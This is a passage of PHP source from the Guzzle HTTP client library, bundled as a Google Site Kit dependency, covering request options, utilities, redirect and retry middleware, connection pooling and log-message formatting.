Associative array of query string values to add * to the request. This option uses PHP's http_build_query() to create * the string representation. Pass a string value if you need more * control than what this method provides */ public const QUERY = 'query'; /** * sink: (resource|string|StreamInterface) Where the data of the * response is written to. Defaults to a PHP temp stream. Providing a * string will write data to a file by the given name. */ public const SINK = 'sink'; /** * synchronous: (bool) Set to true to inform HTTP handlers that you intend * on waiting on the response. This can be useful for optimizations. Note * that a promise is still returned if you are using one of the async * client methods. */ public const SYNCHRONOUS = 'synchronous'; /** * ssl_key: (array|string) Specify the path to a file containing a private * SSL key in PEM format. If a password is required, then set to an array * containing the path to the SSL key in the first array element followed * by the password required for the certificate in the second element. */ public const SSL_KEY = 'ssl_key'; /** * stream: Set to true to attempt to stream a response rather than * download it all up-front. */ public const STREAM = 'stream'; /** * verify: (bool|string, default=true) Describes the SSL certificate * verification behavior of a request. Set to true to enable SSL * certificate verification using the system CA bundle when available * (the default). Set to false to disable certificate verification (this * is insecure!). Set to a string to provide the path to a CA bundle on * disk to enable verification using a custom certificate. */ public const VERIFY = 'verify'; /** * timeout: (float, default=0) Float describing the timeout of the * request in seconds. Use 0 to wait indefinitely (the default behavior). */ public const TIMEOUT = 'timeout'; /** * read_timeout: (float, default=default_socket_timeout ini setting) Float describing * the body read timeout, for stream requests. */ public const READ_TIMEOUT = 'read_timeout'; /** * version: (float) Specifies the HTTP protocol version to attempt to use. */ public const VERSION = 'version'; /** * force_ip_resolve: (bool) Force client to use only ipv4 or ipv6 protocol */ public const FORCE_IP_RESOLVE = 'force_ip_resolve'; } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException; use Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlHandler; use Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlMultiHandler; use Google\Site_Kit_Dependencies\GuzzleHttp\Handler\Proxy; use Google\Site_Kit_Dependencies\GuzzleHttp\Handler\StreamHandler; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; final class Utils { /** * Debug function used to describe the provided value type and class. * * @param mixed $input * * @return string Returns a string containing the type of the variable and * if a class is provided, the class name. */ public static function describeType($input) : string { switch (\gettype($input)) { case 'object': return 'object(' . \get_class($input) . ')'; case 'array': return 'array(' . \count($input) . ')'; default: \ob_start(); \var_dump($input); // normalize float vs double /** @var string $varDumpContent */ $varDumpContent = \ob_get_clean(); return \str_replace('double(', 'float(', \rtrim($varDumpContent)); } } /** * Parses an array of header lines into an associative array of headers. * * @param iterable $lines Header lines array of strings in the following * format: "Name: Value" */ public static function headersFromLines(iterable $lines) : array { $headers = []; foreach ($lines as $line) { $parts = \explode(':', $line, 2); $headers[\trim($parts[0])][] = isset($parts[1]) ? \trim($parts[1]) : null; } return $headers; } /** * Returns a debug stream based on the provided variable. * * @param mixed $value Optional value * * @return resource */ public static function debugResource($value = null) { if (\is_resource($value)) { return $value; } if (\defined('STDOUT')) { return \STDOUT; } return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen('php://output', 'w'); } /** * Chooses and creates a default handler to use based on the environment. * * The returned handler is not wrapped by any default middlewares. * * @return callable(\Psr\Http\Message\RequestInterface, array): \GuzzleHttp\Promise\PromiseInterface Returns the best handler for the given system. * * @throws \RuntimeException if no viable Handler is available. */ public static function chooseHandler() : callable { $handler = null; if (\defined('CURLOPT_CUSTOMREQUEST') && \function_exists('curl_version') && \version_compare(\curl_version()['version'], '7.21.2') >= 0) { if (\function_exists('curl_multi_exec') && \function_exists('curl_exec')) { $handler = \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\Proxy::wrapSync(new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlMultiHandler(), new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlHandler()); } elseif (\function_exists('curl_exec')) { $handler = new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlHandler(); } elseif (\function_exists('curl_multi_exec')) { $handler = new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\CurlMultiHandler(); } } if (\ini_get('allow_url_fopen')) { $handler = $handler ? \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\Proxy::wrapStreaming($handler, new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\StreamHandler()) : new \Google\Site_Kit_Dependencies\GuzzleHttp\Handler\StreamHandler(); } elseif (!$handler) { throw new \RuntimeException('GuzzleHttp requires cURL, the allow_url_fopen ini setting, or a custom HTTP handler.'); } return $handler; } /** * Get the default User-Agent string to use with Guzzle. */ public static function defaultUserAgent() : string { return \sprintf('GuzzleHttp/%d', \Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::MAJOR_VERSION); } /** * Returns the default cacert bundle for the current system. * * First, the openssl.cafile and curl.cainfo php.ini settings are checked. * If those settings are not configured, then the common locations for * bundles found on Red Hat, CentOS, Fedora, Ubuntu, Debian, FreeBSD, OS X * and Windows are checked. If any of these file locations are found on * disk, they will be utilized. * * Note: the result of this function is cached for subsequent calls. * * @throws \RuntimeException if no bundle can be found. * * @deprecated Utils::defaultCaBundle will be removed in guzzlehttp/guzzle:8.0. This method is not needed in PHP 5.6+. */ public static function defaultCaBundle() : string { static $cached = null; static $cafiles = [ // Red Hat, CentOS, Fedora (provided by the ca-certificates package) '/etc/pki/tls/certs/ca-bundle.crt', // Ubuntu, Debian (provided by the ca-certificates package) '/etc/ssl/certs/ca-certificates.crt', // FreeBSD (provided by the ca_root_nss package) '/usr/local/share/certs/ca-root-nss.crt', // SLES 12 (provided by the ca-certificates package) '/var/lib/ca-certificates/ca-bundle.pem', // OS X provided by homebrew (using the default path) '/usr/local/etc/openssl/cert.pem', // Google app engine '/etc/ca-certificates.crt', // Windows? 'C:\\windows\\system32\\curl-ca-bundle.crt', 'C:\\windows\\curl-ca-bundle.crt', ]; if ($cached) { return $cached; } if ($ca = \ini_get('openssl.cafile')) { return $cached = $ca; } if ($ca = \ini_get('curl.cainfo')) { return $cached = $ca; } foreach ($cafiles as $filename) { if (\file_exists($filename)) { return $cached = $filename; } } throw new \RuntimeException(<<<EOT No system CA bundle could be found in any of the the common system locations. PHP versions earlier than 5.6 are not properly configured to use the system's CA bundle by default. In order to verify peer certificates, you will need to supply the path on disk to a certificate bundle to the 'verify' request option: https://docs.guzzlephp.org/en/latest/request-options.html#verify. If you do not need a specific certificate bundle, then Mozilla provides a commonly used CA bundle which can be downloaded here (provided by the maintainer of cURL): https://curl.haxx.se/ca/cacert.pem. Once you have a CA bundle available on disk, you can set the 'openssl.cafile' PHP ini setting to point to the path to the file, allowing you to omit the 'verify' request option. See https://curl.haxx.se/docs/sslcerts.html for more information. EOT ); } /** * Creates an associative array of lowercase header names to the actual * header casing. */ public static function normalizeHeaderKeys(array $headers) : array { $result = []; foreach (\array_keys($headers) as $key) { $result[\strtolower($key)] = $key; } return $result; } /** * Returns true if the provided host matches any of the no proxy areas. * * This method will strip a port from the host if it is present. Each pattern * can be matched with an exact match (e.g., "foo.com" == "foo.com") or a * partial match: (e.g., "foo.com" == "baz.foo.com" and ".foo.com" == * "baz.foo.com", but ".foo.com" != "foo.com"). * * Areas are matched in the following cases: * 1. "*" (without quotes) always matches any hosts. * 2. An exact match. * 3. The area starts with "." and the area is the last part of the host. e.g. * '.mit.edu' will match any host that ends with '.mit.edu'. * * @param string $host Host to check against the patterns. * @param string[] $noProxyArray An array of host patterns. * * @throws InvalidArgumentException */ public static function isHostInNoProxy(string $host, array $noProxyArray) : bool { if (\strlen($host) === 0) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('Empty host provided'); } // Strip port if present. [$host] = \explode(':', $host, 2); foreach ($noProxyArray as $area) { // Always match on wildcards. if ($area === '*') { return \true; } if (empty($area)) { // Don't match on empty values. continue; } if ($area === $host) { // Exact matches. return \true; } // Special match if the area when prefixed with ".". Remove any // existing leading "." and add a new leading ".". $area = '.' . \ltrim($area, '.'); if (\substr($host, -\strlen($area)) === $area) { return \true; } } return \false; } /** * Wrapper for json_decode that throws when an error occurs. * * @param string $json JSON data to parse * @param bool $assoc When true, returned objects will be converted * into associative arrays. * @param int $depth User specified recursion depth. * @param int $options Bitmask of JSON decode options. * * @return object|array|string|int|float|bool|null * * @throws InvalidArgumentException if the JSON cannot be decoded. * * @see https://www.php.net/manual/en/function.json-decode.php */ public static function jsonDecode(string $json, bool $assoc = \false, int $depth = 512, int $options = 0) { $data = \json_decode($json, $assoc, $depth, $options); if (\JSON_ERROR_NONE !== \json_last_error()) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('json_decode error: ' . \json_last_error_msg()); } return $data; } /** * Wrapper for JSON encoding that throws when an error occurs. * * @param mixed $value The value being encoded * @param int $options JSON encode option bitmask * @param int $depth Set the maximum depth. Must be greater than zero. * * @throws InvalidArgumentException if the JSON cannot be encoded. * * @see https://www.php.net/manual/en/function.json-encode.php */ public static function jsonEncode($value, int $options = 0, int $depth = 512) : string { $json = \json_encode($value, $options, $depth); if (\JSON_ERROR_NONE !== \json_last_error()) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('json_encode error: ' . \json_last_error_msg()); } /** @var string */ return $json; } /** * Wrapper for the hrtime() or microtime() functions * (depending on the PHP version, one of the two is used) * * @return float UNIX timestamp * * @internal */ public static function currentTime() : float { return (float) \function_exists('hrtime') ? \hrtime(\true) / 1000000000.0 : \microtime(\true); } /** * @throws InvalidArgumentException * * @internal */ public static function idnUriConvert(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, int $options = 0) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if ($uri->getHost()) { $asciiHost = self::idnToAsci($uri->getHost(), $options, $info); if ($asciiHost === \false) { $errorBitSet = $info['errors'] ?? 0; $errorConstants = \array_filter(\array_keys(\get_defined_constants()), static function (string $name) : bool { return \substr($name, 0, 11) === 'IDNA_ERROR_'; }); $errors = []; foreach ($errorConstants as $errorConstant) { if ($errorBitSet & \constant($errorConstant)) { $errors[] = $errorConstant; } } $errorMessage = 'IDN conversion failed'; if ($errors) { $errorMessage .= ' (errors: ' . \implode(', ', $errors) . ')'; } throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException($errorMessage); } if ($uri->getHost() !== $asciiHost) { // Replace URI only if the ASCII version is different $uri = $uri->withHost($asciiHost); } } return $uri; } /** * @internal */ public static function getenv(string $name) : ?string { if (isset($_SERVER[$name])) { return (string) $_SERVER[$name]; } if (\PHP_SAPI === 'cli' && ($value = \getenv($name)) !== \false && $value !== null) { return (string) $value; } return null; } /** * @return string|false */ private static function idnToAsci(string $domain, int $options, ?array &$info = []) { if (\function_exists('idn_to_ascii') && \defined('INTL_IDNA_VARIANT_UTS46')) { return \idn_to_ascii($domain, $options, \INTL_IDNA_VARIANT_UTS46, $info); } throw new \Error('ext-idn or symfony/polyfill-intl-idn not loaded or too old'); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\BadResponseException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\TooManyRedirectsException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Request redirect middleware. * * Apply this middleware like other middleware using * {@see \GuzzleHttp\Middleware::redirect()}. * * @final */ class RedirectMiddleware { public const HISTORY_HEADER = 'X-Guzzle-Redirect-History'; public const STATUS_HISTORY_HEADER = 'X-Guzzle-Redirect-Status-History'; /** * @var array */ public static $defaultSettings = ['max' => 5, 'protocols' => ['http', 'https'], 'strict' => \false, 'referer' => \false, 'track_redirects' => \false]; /** * @var callable(RequestInterface, array): PromiseInterface */ private $nextHandler; /** * @param callable(RequestInterface, array): PromiseInterface $nextHandler Next handler to invoke. */ public function __construct(callable $nextHandler) { $this->nextHandler = $nextHandler; } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $fn = $this->nextHandler; if (empty($options['allow_redirects'])) { return $fn($request, $options); } if ($options['allow_redirects'] === \true) { $options['allow_redirects'] = self::$defaultSettings; } elseif (!\is_array($options['allow_redirects'])) { throw new \InvalidArgumentException('allow_redirects must be true, false, or array'); } else { // Merge the default settings with the provided settings $options['allow_redirects'] += self::$defaultSettings; } if (empty($options['allow_redirects']['max'])) { return $fn($request, $options); } return $fn($request, $options)->then(function (\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) use($request, $options) { return $this->checkRedirect($request, $options, $response); }); } /** * @return ResponseInterface|PromiseInterface */ public function checkRedirect(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) { if (\strpos((string) $response->getStatusCode(), '3') !== 0 || !$response->hasHeader('Location')) { return $response; } $this->guardMax($request, $response, $options); $nextRequest = $this->modifyRequest($request, $options, $response); // If authorization is handled by curl, unset it if URI is cross-origin. if (\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriComparator::isCrossOrigin($request->getUri(), $nextRequest->getUri()) && \defined('\\CURLOPT_HTTPAUTH')) { unset($options['curl'][\CURLOPT_HTTPAUTH], $options['curl'][\CURLOPT_USERPWD]); } if (isset($options['allow_redirects']['on_redirect'])) { $options['allow_redirects']['on_redirect']($request, $response, $nextRequest->getUri()); } $promise = $this($nextRequest, $options); // Add headers to be able to track history of redirects. if (!empty($options['allow_redirects']['track_redirects'])) { return $this->withTracking($promise, (string) $nextRequest->getUri(), $response->getStatusCode()); } return $promise; } /** * Enable tracking on promise. */ private function withTracking(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise, string $uri, int $statusCode) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $promise->then(static function (\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) use($uri, $statusCode) { // Note that we are pushing to the front of the list as this // would be an earlier response than what is currently present // in the history header. $historyHeader = $response->getHeader(self::HISTORY_HEADER); $statusHeader = $response->getHeader(self::STATUS_HISTORY_HEADER); \array_unshift($historyHeader, $uri); \array_unshift($statusHeader, (string) $statusCode); return $response->withHeader(self::HISTORY_HEADER, $historyHeader)->withHeader(self::STATUS_HISTORY_HEADER, $statusHeader); }); } /** * Check for too many redirects. * * @throws TooManyRedirectsException Too many redirects. */ private function guardMax(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, array &$options) : void { $current = $options['__redirect_count'] ?? 0; $options['__redirect_count'] = $current + 1; $max = $options['allow_redirects']['max']; if ($options['__redirect_count'] > $max) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\TooManyRedirectsException("Will not follow more than {$max} redirects", $request, $response); } } public function modifyRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { // Request modifications to apply. $modify = []; $protocols = $options['allow_redirects']['protocols']; // Use a GET request if this is an entity enclosing request and we are // not forcing RFC compliance, but rather emulating what all browsers // would do. $statusCode = $response->getStatusCode(); if ($statusCode == 303 || $statusCode <= 302 && !$options['allow_redirects']['strict']) { $safeMethods = ['GET', 'HEAD', 'OPTIONS']; $requestMethod = $request->getMethod(); $modify['method'] = \in_array($requestMethod, $safeMethods) ? $requestMethod : 'GET'; $modify['body'] = ''; } $uri = self::redirectUri($request, $response, $protocols); if (isset($options['idn_conversion']) && $options['idn_conversion'] !== \false) { $idnOptions = $options['idn_conversion'] === \true ? \IDNA_DEFAULT : $options['idn_conversion']; $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Utils::idnUriConvert($uri, $idnOptions); } $modify['uri'] = $uri; \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Message::rewindBody($request); // Add the Referer header if it is told to do so and only // add the header if we are not redirecting from https to http. if ($options['allow_redirects']['referer'] && $modify['uri']->getScheme() === $request->getUri()->getScheme()) { $uri = $request->getUri()->withUserInfo(''); $modify['set_headers']['Referer'] = (string) $uri; } else { $modify['remove_headers'][] = 'Referer'; } // Remove Authorization and Cookie headers if URI is cross-origin. if (\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriComparator::isCrossOrigin($request->getUri(), $modify['uri'])) { $modify['remove_headers'][] = 'Authorization'; $modify['remove_headers'][] = 'Cookie'; } return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::modifyRequest($request, $modify); } /** * Set the appropriate URL on the request based on the location header. */ private static function redirectUri(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, array $protocols) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $location = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriResolver::resolve($request->getUri(), new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri($response->getHeaderLine('Location'))); // Ensure that the redirect URI is allowed based on the protocols. if (!\in_array($location->getScheme(), $protocols)) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\BadResponseException(\sprintf('Redirect URI, %s, does not use one of the allowed redirect protocols: %s', $location, \implode(', ', $protocols)), $request, $response); } return $location; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Represents data at the point after it was transferred either successfully * or after a network error. */ final class TransferStats { /** * @var RequestInterface */ private $request; /** * @var ResponseInterface|null */ private $response; /** * @var float|null */ private $transferTime; /** * @var array */ private $handlerStats; /** * @var mixed|null */ private $handlerErrorData; /** * @param RequestInterface $request Request that was sent. * @param ResponseInterface|null $response Response received (if any) * @param float|null $transferTime Total handler transfer time. * @param mixed $handlerErrorData Handler error data. * @param array $handlerStats Handler specific stats. */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?float $transferTime = null, $handlerErrorData = null, array $handlerStats = []) { $this->request = $request; $this->response = $response; $this->transferTime = $transferTime; $this->handlerErrorData = $handlerErrorData; $this->handlerStats = $handlerStats; } public function getRequest() : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { return $this->request; } /** * Returns the response that was received (if any). */ public function getResponse() : ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->response; } /** * Returns true if a response was received. */ public function hasResponse() : bool { return $this->response !== null; } /** * Gets handler specific error data. * * This might be an exception, a integer representing an error code, or * anything else. Relying on this value assumes that you know what handler * you are using. * * @return mixed */ public function getHandlerErrorData() { return $this->handlerErrorData; } /** * Get the effective URI the request was sent to. */ public function getEffectiveUri() : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { return $this->request->getUri(); } /** * Get the estimated time the request was being transferred by the handler. * * @return float|null Time in seconds. */ public function getTransferTime() : ?float { return $this->transferTime; } /** * Gets an array of all of the handler specific transfer data. */ public function getHandlerStats() : array { return $this->handlerStats; } /** * Get a specific handler statistic from the handler by name. * * @param string $stat Handler specific transfer stat to retrieve. * * @return mixed|null */ public function getHandlerStat(string $stat) { return $this->handlerStats[$stat] ?? null; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Middleware that retries requests based on the boolean result of * invoking the provided "decider" function. * * @final */ class RetryMiddleware { /** * @var callable(RequestInterface, array): PromiseInterface */ private $nextHandler; /** * @var callable */ private $decider; /** * @var callable(int) */ private $delay; /** * @param callable $decider Function that accepts the number of retries, * a request, [response], and [exception] and * returns true if the request is to be * retried. * @param callable(RequestInterface, array): PromiseInterface $nextHandler Next handler to invoke. * @param (callable(int): int)|null $delay Function that accepts the number of retries * and returns the number of * milliseconds to delay. */ public function __construct(callable $decider, callable $nextHandler, ?callable $delay = null) { $this->decider = $decider; $this->nextHandler = $nextHandler; $this->delay = $delay ?: __CLASS__ . '::exponentialDelay'; } /** * Default exponential backoff delay function. * * @return int milliseconds. */ public static function exponentialDelay(int $retries) : int { return (int) 2 ** ($retries - 1) * 1000; } public function __invoke(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if (!isset($options['retries'])) { $options['retries'] = 0; } $fn = $this->nextHandler; return $fn($request, $options)->then($this->onFulfilled($request, $options), $this->onRejected($request, $options)); } /** * Execute fulfilled closure */ private function onFulfilled(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) : callable { return function ($value) use($request, $options) { if (!($this->decider)($options['retries'], $request, $value, null)) { return $value; } return $this->doRetry($request, $options, $value); }; } /** * Execute rejected closure */ private function onRejected(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $req, array $options) : callable { return function ($reason) use($req, $options) { if (!($this->decider)($options['retries'], $req, null, $reason)) { return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::rejectionFor($reason); } return $this->doRetry($req, $options); }; } private function doRetry(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $options['delay'] = ($this->delay)(++$options['retries'], $response, $request); return $this($request, $options); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; interface BodySummarizerInterface { /** * Returns a summarized message body. */ public function summarize(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message) : ?string; } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\EachPromise; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromisorInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Sends an iterator of requests concurrently using a capped pool size. * * The pool will read from an iterator until it is cancelled or until the * iterator is consumed. When a request is yielded, the request is sent after * applying the "request_options" request options (if provided in the ctor). * * When a function is yielded by the iterator, the function is provided the * "request_options" array that should be merged on top of any existing * options, and the function MUST then return a wait-able promise. * * @final */ class Pool implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromisorInterface { /** * @var EachPromise */ private $each; /** * @param ClientInterface $client Client used to send the requests. * @param array|\Iterator $requests Requests or functions that return * requests to send concurrently. * @param array $config Associative array of options * - concurrency: (int) Maximum number of requests to send concurrently * - options: Array of request options to apply to each request. * - fulfilled: (callable) Function to invoke when a request completes. * - rejected: (callable) Function to invoke when a request is rejected. */ public function __construct(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client, $requests, array $config = []) { if (!isset($config['concurrency'])) { $config['concurrency'] = 25; } if (isset($config['options'])) { $opts = $config['options']; unset($config['options']); } else { $opts = []; } $iterable = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::iterFor($requests); $requests = static function () use($iterable, $client, $opts) { foreach ($iterable as $key => $rfn) { if ($rfn instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface) { (yield $key => $client->sendAsync($rfn, $opts)); } elseif (\is_callable($rfn)) { (yield $key => $rfn($opts)); } else { throw new \InvalidArgumentException('Each value yielded by the iterator must be a Psr7\\Http\\Message\\RequestInterface or a callable that returns a promise that fulfills with a Psr7\\Message\\Http\\ResponseInterface object.'); } } }; $this->each = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\EachPromise($requests(), $config); } /** * Get promise */ public function promise() : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->each->promise(); } /** * Sends multiple requests concurrently and returns an array of responses * and exceptions that uses the same ordering as the provided requests. * * IMPORTANT: This method keeps every request and response in memory, and * as such, is NOT recommended when sending a large number or an * indeterminate number of requests concurrently. * * @param ClientInterface $client Client used to send the requests * @param array|\Iterator $requests Requests to send concurrently. * @param array $options Passes through the options available in * {@see \GuzzleHttp\Pool::__construct} * * @return array Returns an array containing the response or an exception * in the same order that the requests were sent. * * @throws \InvalidArgumentException if the event format is incorrect. */ public static function batch(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client, $requests, array $options = []) : array { $res = []; self::cmpCallback($options, 'fulfilled', $res); self::cmpCallback($options, 'rejected', $res); $pool = new static($client, $requests, $options); $pool->promise()->wait(); \ksort($res); return $res; } /** * Execute callback(s) */ private static function cmpCallback(array &$options, string $name, array &$results) : void { if (!isset($options[$name])) { $options[$name] = static function ($v, $k) use(&$results) { $results[$k] = $v; }; } else { $currentFn = $options[$name]; $options[$name] = static function ($v, $k) use(&$results, $currentFn) { $currentFn($v, $k); $results[$k] = $v; }; } } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Formats log messages using variable substitutions for requests, responses, * and other transactional data. * * The following variable substitutions are supported: * * - {request}: Full HTTP request message * - {response}: Full HTTP response message * - {ts}: ISO 8601 date in GMT * - {date_iso_8601} ISO 8601 date in GMT * - {date_common_log} Apache common log date using the configured timezone. * - {host}: Host of the request * - {method}: Method of the request * - {uri}: URI of the request * - {version}: Protocol version * - {target}: Request target of the request (path + query + fragment) * - {hostname}: Hostname of the machine that sent the request * - {code}: Status code of the response (if available) * - {phrase}: Reason phrase of the response (if available) * - {error}: Any error messages (if available) * - {req_header_*}: Replace `*` with the lowercased name of a request header to add to the message * - {res_header_*}: Replace `*` with the lowercased name of a response header to add to the message * - {req_headers}: Request headers * - {res_headers}: Response headers * - {req_body}: Request body * - {res_body}: Response body * * @final */ class MessageFormatter implements \Google\Site_Kit_Dependencies\GuzzleHttp\MessageFormatterInterface { /** * Apache Common Log Format. * * @see https://httpd.apache.org/docs/2.4/logs.html#common * * @var string */ public const CLF = '{hostname} {req_header_User-Agent} - [{date_common_log}] "{method} {target} HTTP/{version}" {code} {res_header_Content-Length}'; public const DEBUG = ">>>>>>>>\n{request}\n<<<<<<<<\n{response}\n--------\n{error}"; public const SHORT = '[{ts}] "{method} {target} HTTP/{version}" {code}'; /** * @var string Template used to format log messages */ private $template; /** * @param string $template Log message template */ public function __construct(?string $template = self::CLF) { $this->template = $template ?: self::CLF; } /** * Returns a formatted message string. * * @param RequestInterface $request Request that was sent * @param ResponseInterface|null $response Response that was received * @param \Throwable|null $error Exception that was received */ public function format(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response = null, ?\Throwable $error = null) : string { $cache = []; /** @var string */ return \preg_replace_callback('/{\\s*([A-Za-z_\\-\\.0-9]+)\\s*}/', function (array $matches) use($request, $response, $error, &$cache) { if (isset($cache[$matches[1]])) { return $cache[$matches[1]]; } $result = ''; switch ($matches[1]) { case 'request': $result = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Message::toString($request); break; case 'response': $result = $response ? \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Message::toString($response) : ''; break; case 'req_headers': $result = \trim($request->getMethod() . ' ' . $request->getRequestTarget()) . ' HTTP/' . $request->getProtocolVersion() . "\r\n" . $this->headers($request); break; case 'res_headers': $result = $response ? \sprintf('HTTP/%s %d %s', $response->getProtocolVersion(), $response->getStatusCode(), $response->getReasonPhrase()) . "\r\n" . $this->headers($response) : 'NULL'; break; case 'req_body': $result = $request->getBody()->__toString(); break; case 'res_body': if (!$response instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface) { $result = 'NULL'; break; } $body = $response->getBody(); if (!$body->isSeekable()) { $result = 'RESPONSE_NOT_LOGGEABLE'; break; } $result = $response->getBody()->__toString(); break; case 'ts': case 'date_iso_8601': $result = \gmdate('c'); break; case 'date_common_log': $result = \date('d/M/Y:H:i:s O'); break; case 'method': $result = $request->getMethod(); break; case 'version': $result = $request->getProtocolVersion(); break; case 'uri': case 'url': $result = $request->getUri()->__toString(); break; case 'target': $result = $request->getRequestTarget(); break; case 'req_version': $result = $request->getProtocolVersion(); break; case 'res_version': $result = $response ? $response->getProtocolVersion() : 'NULL'; break; case 'host': $result = $request->getHeaderLine('Host'); break; case 'hostname': $result = \gethostname(); break; case 'code': $result = $response ? $response->getStatusCode() : 'NULL'; break; case 'phrase': $result = $response ? $response->getReasonPhrase() : 'NULL'; break; case 'error': $result = $error ? $error->getMessage() : 'NULL'; break; default: // handle prefixed dynamic headers if (\strpos($matches[1], 'req_header_') === 0) { $result = 